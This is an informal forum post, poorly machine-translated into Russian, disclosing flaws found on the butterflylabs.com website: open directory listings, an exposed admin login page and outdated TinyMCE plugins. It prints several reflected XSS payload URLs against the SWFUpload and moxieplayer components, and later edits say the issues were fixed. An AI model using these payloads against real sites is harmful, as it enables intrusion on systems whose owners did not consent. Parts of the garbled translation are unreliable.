Просто для удовольствия, вот что я нашел:
- Directory Listing Enabled
-- Интересные каталоги:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <- Что, черт возьми, этот материал? Личные файлы и фотографии?
- 2 уязвимых плагинов tiny_mce (обе уязвимости были исправлены в течение веков, они не обновляются)
-- Archiv и это SWFUpload XSS. Там в 2 индивидуальный XSS»здесь, используя 2 различных параметров.
--- используя MovieName:
Код:
www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(%22stay % 20classy% 20BFL% 22); //
Код:
http://www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=.%3Cimg%20src='http://www.cabelas.com/assets/product_files/image/xss_reel .gif '% 3E
Код:
http://www.butterflylabs.com/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.12.67.18/tears.flv
-- Некоторые доказательства: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Администратор страницы Логин: http://butterflylabs.com/admin
Не доверять компаниям этого дилетанту.
EDIT: Поздравляем быстрых исправлений. Теперь отключить каталог листинга @ https://support.butterflylabs.com/
EDIT 2: Все это исправлено. Оставайтесь на пальцах BFL ... Я не сделал